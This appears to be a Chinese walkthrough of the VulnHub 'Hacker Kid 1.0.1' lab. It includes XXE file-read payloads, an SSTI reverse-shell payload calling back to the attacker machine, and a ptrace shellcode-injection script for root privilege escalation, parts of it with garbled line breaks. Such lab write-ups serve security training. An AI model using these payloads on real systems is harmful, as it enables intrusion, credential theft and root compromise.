HACKER KID: 1.0.1实战演练

HACKER KID: 1.0.1实战演练

一、前期准备

1、相关信息

靶机网站：https://www.vulnhub.com/entry/hacker-kid-101,719/

设备名称	IP地址
攻击机：kali	192.168.0.109
靶机：Hacker kid: 1.0.1	192.168.0.103

二、信息收集

1、端口扫描

┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.0.103

//开放DNS:53端口、WEB:80端口、9999端口
//DNS:53端口版本号ISC BIND 9.16.1
//WEB:80端口中间件为Apache-httpd 2.4.41
//MySQL:3306端口版本号为Tornado httpd 6.1

2、访问网站

http://192.168.0.103/

翻译为：
你给我起了一个“臭名昭著的黑客”的名字！！就因为我黑了你的整个服务器。
现在我可以访问你的整个服务器了。如果你足够聪明，可以取回它，就给我看看。
“你越挖我，你就会在你的服务器上找到我。挖我…挖我更多”

http://192.168.0.103/index.html

//无法访问，返回404

http://192.168.0.103/#app.html

//发现出现一个#符号，页面没有变化

http://192.168.0.103/app.html

//功能没法使用

http://192.168.0.103/#form.html

//发现出现一个#符号，页面没有变化

http://192.168.0.103/form.html

3、扫描目录

┌──(kali㉿kali)-[~]
└─$ sudo dirsearch -u http://192.168.0.103   

4、查看源码

view-source:http://192.168.0.103/index.php

//使用GET提交page_no请求新的页面

5、请求参数

http://192.168.0.103/index.php?page_no=1

//有回显，批量测试

6、burpsuite批量请求

//原文为：
Okay so you want me to speak something ?
I am a hacker kid not a dumb hacker. So i created some subdomains to return back on the server whenever i want!!
Out of my many homes...one such home..one such home for me : hackers.blackhat.local
//翻译为：
好吧，你想让我说点什么？
我是一个黑客孩子，而不是一个愚蠢的黑客。所以我创建了一些子域，以便随时返回服务器！！
在我的许多家里。。。一个这样的家。。对我来说就是这样一个家：hackers.blackhat.local

7、编辑hosts文件

┌──(kali㉿kali)-[~]
└─$ sudo vim /etc/hosts 

//添加192.168.0.103   hackers.blackhat.local

8、DNS区域传输

┌──(kali㉿kali)-[~]
└─$ dig axfr @192.168.0.103 blackhat.local

9、编辑hosts

┌──(kali㉿kali)-[~]
└─$ sudo vim /etc/hosts  

10、访问网站

http://hackerkid.blackhat.local/

//发现一个注册界面

11、注册账号

//提示邮箱错误

12、burpsuite抓包

//发现是XML传输数据的

13、XML注入

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>
<root><name>kali</name><tel>13911111111</tel><email>&xxe;</email><password>123456</password>
</root>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY  xxe  SYSTEM   "php://filter/convert.base64-encode/resource=/home/saket/.bashrc"  >]>   
<root><name>kali</name><tel>13911111111</tel><email>&xxe;</email><password>123456</password>
</root>

14、解密

//账号：admin
//密码：Saket!#$%@!!

15、登录网站的9999端口

http://192.168.0.103:9999/login?next=%2F

//账号：saket，密码：Saket!#$%@!!
//原文为：
Tell me your name buddy
How can i get to know who are you ??
//翻译为：
告诉我你的名字，伙计
我怎么才能知道你是谁？？ 

16、提交参数

//编码前：
{% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/192.168.0.109/4444 0>&1"')}}
//编码后：
%7B%25%20import%20os%20%25%7D%7B%7Bos.system('bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.0.109%2F4444%200%3E%261%22')%7D%7D

17、监听

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4444      

三、提权

1、查找具有Capabilities特殊操作权限的程序

saket@ubuntu:~$ /usr/sbin/getcap -r / 2>/dev/null 

2、创建源码文件

# inject.py# The C program provided at the GitHub Link given below can be used as a reference for writing the python script.
# GitHub Link: https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c import ctypes
import sys
import struct# Macros defined in <sys/ptrace.h>
# https://code.woboq.org/qt5/include/sys/ptrace.h.htmlPTRACE_POKETEXT   = 4
PTRACE_GETREGS    = 12
PTRACE_SETREGS    = 13
PTRACE_ATTACH     = 16
PTRACE_DETACH     = 17# Structure defined in <sys/user.h>
# https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_structclass user_regs_struct(ctypes.Structure):_fields_ = [("r15", ctypes.c_ulonglong),("r14", ctypes.c_ulonglong),("r13", ctypes.c_ulonglong),("r12", ctypes.c_ulonglong),("rbp", ctypes.c_ulonglong),("rbx", ctypes.c_ulonglong),("r11", ctypes.c_ulonglong),("r10", ctypes.c_ulonglong),("r9", ctypes.c_ulonglong),("r8", ctypes.c_ulonglong),("rax", ctypes.c_ulonglong),("rcx", ctypes.c_ulonglong),("rdx", ctypes.c_ulonglong),("rsi", ctypes.c_ulonglong),("rdi", ctypes.c_ulonglong),("orig_rax", ctypes.c_ulonglong),("rip", ctypes.c_ulonglong),("cs", ctypes.c_ulonglong),("eflags", ctypes.c_ulonglong),("rsp", ctypes.c_ulonglong),("ss", ctypes.c_ulonglong),("fs_base", ctypes.c_ulonglong),("gs_base", ctypes.c_ulonglong),("ds", ctypes.c_ulonglong),("es", ctypes.c_ulonglong),("fs", ctypes.c_ulonglong),("gs", ctypes.c_ulonglong),]libc = ctypes.CDLL("libc.so.6")pid=int(sys.argv[1])# Define argument type and respone type.
libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p]
libc.ptrace.restype = ctypes.c_uint64# Attach to the process
libc.ptrace(PTRACE_ATTACH, pid, None, None)
registers=user_regs_struct()# Retrieve the value stored in registers
libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))print("Instruction Pointer: " + hex(registers.rip))print("Injecting Shellcode at: " + hex(registers.rip))# Shell code copied from exploit db.
shellcode="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"# Inject the shellcode into the running process byte by byte.
for i in xrange(0,len(shellcode),4):# Convert the byte to little endian.shellcode_byte_int=int(shellcode[i:4+i].encode('hex'),16)shellcode_byte_little_endian=struct.pack("<I", shellcode_byte_int).rstrip('\x00').encode('hex')shellcode_byte=int(shellcode_byte_little_endian,16)# Inject the byte.libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.rip+i),shellcode_byte)print("Shellcode Injected!!")# Modify the instuction pointer
registers.rip=registers.rip+2# Set the registers
libc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers))print("Final Instruction Pointer: " + hex(registers.rip))# Detach from the process.
libc.ptrace(PTRACE_DETACH, pid, None, None)

3、开机本地开启http服务

┌──(kali㉿kali)-[~]
└─$ python -m http.server 8080

4、下载脚本

saket@ubuntu:~$ wget http://192.168.0.109:8080/inject.py

5、查看以root运行的进程

saket@ubuntu:~$ ps -aef | grep root

6、执行脚本

saket@ubuntu:~$ python2.7 inject.py 670

7、查看端口是否开放

saket@ubuntu:~$ netstat -ano | grep 5600

//如果端口没打开，可以重新选择进程号

8、连接端口

┌──(kali㉿kali)-[~]
└─$ nc 192.168.0.103 5600